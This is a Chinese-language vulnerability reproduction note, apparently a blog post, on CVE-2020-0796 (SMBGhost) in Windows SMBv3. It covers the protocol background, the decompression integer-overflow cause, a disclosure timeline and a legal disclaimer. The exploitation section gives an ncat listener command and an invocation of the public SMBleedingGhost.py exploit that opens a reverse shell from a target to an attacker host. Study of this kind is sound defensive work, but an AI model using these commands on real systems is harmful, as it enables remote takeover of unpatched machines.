漏洞基本信息
服務器消息塊(SMB),是一個網絡通信協議,用於提供共享訪問到文件,打印機和串行端口的節點之間的網絡上。它還提供了經過身份驗證的進程間通信機制。SMB的大多數用法涉及運行Microsoft Windows的計算機,在引入Active Directory之前被稱為“ Microsoft Windows網絡” 。相應的Windows服務是用於服務器組件的LAN Manager服務器和用於客戶端組件的LAN Manager工作站。
Windows 10和Windows Server 2016引入了SMB 3.1.1 。除了在SMB3中添加的AES-128 CCM加密外,該版本還支持AES-128 GCM加密,並使用SHA-512哈希實現預認證完整性檢查。當使用SMB 2.x和更高版本連接到客戶端時,SMB 3.1.1還使安全協商成為必需。
CVE-2020-0796,微軟SMBv3 Client/Server遠程代碼執行漏洞。該漏洞存在於srv2.sys文件中,由於SMB沒有正確處理壓縮的數據包,在解壓數據包的時候使用客戶端傳過來的長度進行解壓時,並沒有檢查長度是否合法,最終導致整數溢出。
漏洞復現
漏洞POC驗證
漏洞EXP利用
1、nc端口監聽
2、
python3 SMBleedingGhost.py 192.168.2.153 192.168.2.137 8888
//說明:
//ncat -lvp <port>
//SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>
漏洞時間線
3月10日:微軟發布安全通告ADV200005,稱SMBv3協議在處理某些請求的方式中存在代碼執行漏洞,並提供了緩解措施。
3月11日:國外某廠商針對該漏洞發布安全防護規則更新。
3月11日:微軟SMBv3協議遠程代碼執行漏洞(CVE-2020-0796)通告。
3月12日:微軟正式發布CVE-2020-0796安全通告和漏洞修復補丁。
3月13日:微軟SMBv3協議遠程代碼執行漏洞(CVE-2020-0796)處置手冊。
導致系統藍屏的漏洞利用程序:
3月30日:該漏洞本地提權PoC流出。
3月31日:復現本地提權利用並發布PoC情報。
4月14日:有國外研究者發布疑似漏洞利用EXP演示視頻,鏈接https://twitter.com/RicercaSec/status/1249904222490918917。
6月2日:監測到研究人員公布此漏洞遠程利用代碼,現實威脅提升。
6月3日:該漏洞遠程利用PoC公開通告。
SMBv3漏洞本地提權
msf集成
微軟SMBv3協議遠程代碼執行漏洞(CVE-2020-0796)PoC公開處置手冊
待更新
RCE
漏洞原理分析
https://www.cnblogs.com/backlion/p/13050249.html
聲明
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!